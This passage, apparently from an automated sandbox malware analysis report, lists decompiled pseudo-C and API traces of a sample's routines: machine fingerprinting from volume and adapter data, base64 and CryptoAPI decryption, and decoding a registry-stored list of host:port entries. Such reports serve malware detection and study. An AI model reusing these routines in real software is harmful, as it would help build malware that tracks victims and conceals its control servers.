                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E47F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E48EB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E47F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 024E490B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E47F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 024E493C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E47F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 024E496F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E47F0: CryptDestroyKey.ADVAPI32(00000000), ref: 024E4982
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E468F
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E47C0
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 024E47E0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4e657b7cc6765704a58a30b61fda9fb009c45d718484927567a8f85faf6a8dfa
                                                                                                                                                                                                                                                                                                        • Instruction ID: eea633371916205c97d5e5c52975af300c8ad3c159cb75f7d56bce2357941d03
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e657b7cc6765704a58a30b61fda9fb009c45d718484927567a8f85faf6a8dfa
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F817C74901A28DBEF24CB54DC95BAAB7B5AF49306F0091CAE509AB2C1D7749BC1CF90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E024E9D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				char _v292;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v296;
                                                                                                                                                                                                                                                                                                        				char _v404;
                                                                                                                                                                                                                                                                                                        				long _v408;
                                                                                                                                                                                                                                                                                                        				char _v673;
                                                                                                                                                                                                                                                                                                        				char _v676;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v680;
                                                                                                                                                                                                                                                                                                        				long _v684;
                                                                                                                                                                                                                                                                                                        				signed int _v688;
                                                                                                                                                                                                                                                                                                        				short* _v692;
                                                                                                                                                                                                                                                                                                        				signed int _v696;
                                                                                                                                                                                                                                                                                                        				unsigned int _v700;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v704;
                                                                                                                                                                                                                                                                                                        				char _v900;
                                                                                                                                                                                                                                                                                                        				signed int _v904;
                                                                                                                                                                                                                                                                                                        				signed int _v908;
                                                                                                                                                                                                                                                                                                        				int _v912;
                                                                                                                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                                                                                                                                        				short** _t76;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v24 = 6;
                                                                                                                                                                                                                                                                                                        					_v684 = 0;
                                                                                                                                                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                                                                                                                                                        					_v408 = 0;
                                                                                                                                                                                                                                                                                                        					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                                                        					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                                                        					_v680 = _a4;
                                                                                                                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                                                        						_v673 = 0;
                                                                                                                                                                                                                                                                                                        						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                                                        						if(_t71 != 0) {
                                                                                                                                                                                                                                                                                                        							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        							E024E7D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                                                        							_v700 = 0;
                                                                                                                                                                                                                                                                                                        							_t74 = E024E9F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                                                        							if(_t74 != 0) {
                                                                                                                                                                                                                                                                                                        								_v904 = 0;
                                                                                                                                                                                                                                                                                                        								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                                                        									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                                                        									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v696 = _v684;
                                                                                                                                                                                                                                                                                                        							_v908 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v908 < 4) {
                                                                                                                                                                                                                                                                                                        								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                                                        								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                                                        								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t76 =  &_v692;
                                                                                                                                                                                                                                                                                                        							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                                                                        							_v704 = _t76;
                                                                                                                                                                                                                                                                                                        							if(_v704 >= 0) {
                                                                                                                                                                                                                                                                                                        								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                                                        								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}





























                                                                                                                                                                                                                                                                                                        0x024e9d29
                                                                                                                                                                                                                                                                                                        0x024e9d31
                                                                                                                                                                                                                                                                                                        0x024e9d4b
                                                                                                                                                                                                                                                                                                        0x024e9d52
                                                                                                                                                                                                                                                                                                        0x024e9d59
                                                                                                                                                                                                                                                                                                        0x024e9d63
                                                                                                                                                                                                                                                                                                        0x024e9d6a
                                                                                                                                                                                                                                                                                                        0x024e9d74
                                                                                                                                                                                                                                                                                                        0x024e9d7b
                                                                                                                                                                                                                                                                                                        0x024e9d88
                                                                                                                                                                                                                                                                                                        0x024e9da2
                                                                                                                                                                                                                                                                                                        0x024e9da8
                                                                                                                                                                                                                                                                                                        0x024e9ddd
                                                                                                                                                                                                                                                                                                        0x024e9de5
                                                                                                                                                                                                                                                                                                        0x024e9deb
                                                                                                                                                                                                                                                                                                        0x024e9e03
                                                                                                                                                                                                                                                                                                        0x024e9e0b
                                                                                                                                                                                                                                                                                                        0x024e9e28
                                                                                                                                                                                                                                                                                                        0x024e9e32
                                                                                                                                                                                                                                                                                                        0x024e9e34
                                                                                                                                                                                                                                                                                                        0x024e9e4f
                                                                                                                                                                                                                                                                                                        0x024e9e73
                                                                                                                                                                                                                                                                                                        0x024e9e49
                                                                                                                                                                                                                                                                                                        0x024e9e49
                                                                                                                                                                                                                                                                                                        0x024e9e4f
                                                                                                                                                                                                                                                                                                        0x024e9e81
                                                                                                                                                                                                                                                                                                        0x024e9e87
                                                                                                                                                                                                                                                                                                        0x024e9ea2
                                                                                                                                                                                                                                                                                                        0x024e9ecf
                                                                                                                                                                                                                                                                                                        0x024e9ee4
                                                                                                                                                                                                                                                                                                        0x024e9e9c
                                                                                                                                                                                                                                                                                                        0x024e9e9c
                                                                                                                                                                                                                                                                                                        0x024e9eec
                                                                                                                                                                                                                                                                                                        0x024e9ef7
                                                                                                                                                                                                                                                                                                        0x024e9efd
                                                                                                                                                                                                                                                                                                        0x024e9f0a
                                                                                                                                                                                                                                                                                                        0x024e9f2b
                                                                                                                                                                                                                                                                                                        0x024e9f46
                                                                                                                                                                                                                                                                                                        0x024e9f4c
                                                                                                                                                                                                                                                                                                        0x024e9f4c
                                                                                                                                                                                                                                                                                                        0x024e9f57
                                                                                                                                                                                                                                                                                                        0x024e9f57
                                                                                                                                                                                                                                                                                                        0x024e9de5
                                                                                                                                                                                                                                                                                                        0x024e9da2
                                                                                                                                                                                                                                                                                                        0x024e9f63

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 024E9D9A
                                                                                                                                                                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 024E9DDD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E9F70: GetAdaptersInfo.IPHLPAPI(00000000,024E9E2D), ref: 024E9FEB
                                                                                                                                                                                                                                                                                                        • StringFromCLSID.OLE32(00000020,?), ref: 024E9EF7
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 024E9F25
                                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 024E9F46
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 024E9F57
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: e68404204ebd1b7abe26fe086759a0ce0ca836a08e784390c928e1be594dd20d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 41d8e0a7f374c9e0d9b625bc6202f0c4c460fd6b669aea19184babd3caa7192c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e68404204ebd1b7abe26fe086759a0ce0ca836a08e784390c928e1be594dd20d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 935128719013289FEF25DF54CD88BEAB7B9BF44305F1482DAE51A6A280DB709B84CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E1390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				signed char* _v8;
                                                                                                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                                                                                                                        				signed int _t57;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t52 = __eax;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v24 = 0;
                                                                                                                                                                                                                                                                                                        					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                                                        					_v28 = _t57;
                                                                                                                                                                                                                                                                                                        					if(_v28 != 0) {
                                                                                                                                                                                                                                                                                                        						E024E7B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                                                        						E024E7B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                                                        						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                                                        						_v8 = _v28;
                                                                                                                                                                                                                                                                                                        						_v20 = 3;
                                                                                                                                                                                                                                                                                                        						while(_v20 == 3) {
                                                                                                                                                                                                                                                                                                        							_v32 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v32 < 4) {
                                                                                                                                                                                                                                                                                                        								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                                                        									_t76 = E024E1500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                                                        									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                                                        									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                                        										break;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                                                        								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                                                        								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t64 = E024E1580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                                                        							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                                                        							_v20 = _t64;
                                                                                                                                                                                                                                                                                                        							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                                                        								E024E7B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                                                        								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                                                        								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                                                        								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                                                        								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
                                                                                                                                                                                                                                                                                                        						return _v24;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                                                                                                        0x024e1390
                                                                                                                                                                                                                                                                                                        0x024e139a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e13b6
                                                                                                                                                                                                                                                                                                        0x024e13b6
                                                                                                                                                                                                                                                                                                        0x024e13cd
                                                                                                                                                                                                                                                                                                        0x024e13d3
                                                                                                                                                                                                                                                                                                        0x024e13da
                                                                                                                                                                                                                                                                                                        0x024e13f0
                                                                                                                                                                                                                                                                                                        0x024e1406
                                                                                                                                                                                                                                                                                                        0x024e140b
                                                                                                                                                                                                                                                                                                        0x024e1411
                                                                                                                                                                                                                                                                                                        0x024e1414
                                                                                                                                                                                                                                                                                                        0x024e141b
                                                                                                                                                                                                                                                                                                        0x024e1425
                                                                                                                                                                                                                                                                                                        0x024e1437
                                                                                                                                                                                                                                                                                                        0x024e143d
                                                                                                                                                                                                                                                                                                        0x024e144f
                                                                                                                                                                                                                                                                                                        0x024e1454
                                                                                                                                                                                                                                                                                                        0x024e1459
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e1461
                                                                                                                                                                                                                                                                                                        0x024e1461
                                                                                                                                                                                                                                                                                                        0x024e146e
                                                                                                                                                                                                                                                                                                        0x024e1478
                                                                                                                                                                                                                                                                                                        0x024e1434
                                                                                                                                                                                                                                                                                                        0x024e1434
                                                                                                                                                                                                                                                                                                        0x024e1485
                                                                                                                                                                                                                                                                                                        0x024e148a
                                                                                                                                                                                                                                                                                                        0x024e148d
                                                                                                                                                                                                                                                                                                        0x024e1496
                                                                                                                                                                                                                                                                                                        0x024e14bc
                                                                                                                                                                                                                                                                                                        0x024e14c1
                                                                                                                                                                                                                                                                                                        0x024e14ca
                                                                                                                                                                                                                                                                                                        0x024e14d3
                                                                                                                                                                                                                                                                                                        0x024e14dc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e14dc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e14ab
                                                                                                                                                                                                                                                                                                        0x024e14f1
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e14f7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e13dc

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 024E13C6
                                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 024E13CD
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E149E
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 024E14A5
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E14EA
                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 024E14F1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                                                        • String ID: ====
                                                                                                                                                                                                                                                                                                        • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                                                        • Opcode ID: f5ef825581df7626d06cffd0bb99f6cc131e6e019da16b8e56003559abec25be
                                                                                                                                                                                                                                                                                                        • Instruction ID: e7073fda1d388c70cb8edf0e1afdbc3286338002d90f7857b00f83c8601f02b2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5ef825581df7626d06cffd0bb99f6cc131e6e019da16b8e56003559abec25be
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE415CB5D40209DBEF04CF94D884BAEBBB5BF4430AF10861BE51AA7380D3309A55CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                                        			E024E7970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t83;
                                                                                                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					_v16 = 0x8c;
                                                                                                                                                                                                                                                                                                        					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                                                        					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t50;
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_t72 =  *0x24ee28c; // 0x24f3f88
                                                                                                                                                                                                                                                                                                        						_t83 =  *0x24f18a0; // 0x24f3b88
                                                                                                                                                                                                                                                                                                        						_t52 = E024EA400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                                                        						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                                                        						_v24 = _t52;
                                                                                                                                                                                                                                                                                                        						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                                                        							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                                                        							_t58 = E024E8A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x24f30e8, 0x254);
                                                                                                                                                                                                                                                                                                        							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                                                        							if(_t58 != 0) {
                                                                                                                                                                                                                                                                                                        								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                                                        								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                                                        								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        								if(_v40 != 0) {
                                                                                                                                                                                                                                                                                                        									_v48 = 0;
                                                                                                                                                                                                                                                                                                        									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                                                        										_t64 = E024E7B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                                                        										_push(_v44);
                                                                                                                                                                                                                                                                                                        										L024EB1EC();
                                                                                                                                                                                                                                                                                                        										_v52 = _t64;
                                                                                                                                                                                                                                                                                                        										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                                                        										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									 *_a4 = _v40;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                                                                                                        0x024e7976
                                                                                                                                                                                                                                                                                                        0x024e7981
                                                                                                                                                                                                                                                                                                        0x024e7987
                                                                                                                                                                                                                                                                                                        0x024e798e
                                                                                                                                                                                                                                                                                                        0x024e79a3
                                                                                                                                                                                                                                                                                                        0x024e79a9
                                                                                                                                                                                                                                                                                                        0x024e79b0
                                                                                                                                                                                                                                                                                                        0x024e79bf
                                                                                                                                                                                                                                                                                                        0x024e79c6
                                                                                                                                                                                                                                                                                                        0x024e79cd
                                                                                                                                                                                                                                                                                                        0x024e79d2
                                                                                                                                                                                                                                                                                                        0x024e79d5
                                                                                                                                                                                                                                                                                                        0x024e79df
                                                                                                                                                                                                                                                                                                        0x024e79ed
                                                                                                                                                                                                                                                                                                        0x024e7a10
                                                                                                                                                                                                                                                                                                        0x024e7a15
                                                                                                                                                                                                                                                                                                        0x024e7a1a
                                                                                                                                                                                                                                                                                                        0x024e7a29
                                                                                                                                                                                                                                                                                                        0x024e7a38
                                                                                                                                                                                                                                                                                                        0x024e7a51
                                                                                                                                                                                                                                                                                                        0x024e7a58
                                                                                                                                                                                                                                                                                                        0x024e7a5a
                                                                                                                                                                                                                                                                                                        0x024e7a6c
                                                                                                                                                                                                                                                                                                        0x024e7a84
                                                                                                                                                                                                                                                                                                        0x024e7a8f
                                                                                                                                                                                                                                                                                                        0x024e7a90
                                                                                                                                                                                                                                                                                                        0x024e7a95
                                                                                                                                                                                                                                                                                                        0x024e7abc
                                                                                                                                                                                                                                                                                                        0x024e7ac2
                                                                                                                                                                                                                                                                                                        0x024e7acb
                                                                                                                                                                                                                                                                                                        0x024e7a69
                                                                                                                                                                                                                                                                                                        0x024e7a69
                                                                                                                                                                                                                                                                                                        0x024e7ad6
                                                                                                                                                                                                                                                                                                        0x024e7ad6
                                                                                                                                                                                                                                                                                                        0x024e7a58
                                                                                                                                                                                                                                                                                                        0x024e7a1a
                                                                                                                                                                                                                                                                                                        0x024e7ae3
                                                                                                                                                                                                                                                                                                        0x024e7ae3
                                                                                                                                                                                                                                                                                                        0x024e79b0
                                                                                                                                                                                                                                                                                                        0x024e7aef

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 024E79A3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024EA400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 024EA45C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024EA400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 024EA480
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024EA400: RegCloseKey.KERNEL32(00000000), ref: 024EA494
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E7AE3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8AD3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: GetLastError.KERNEL32 ref: 024E8ADD
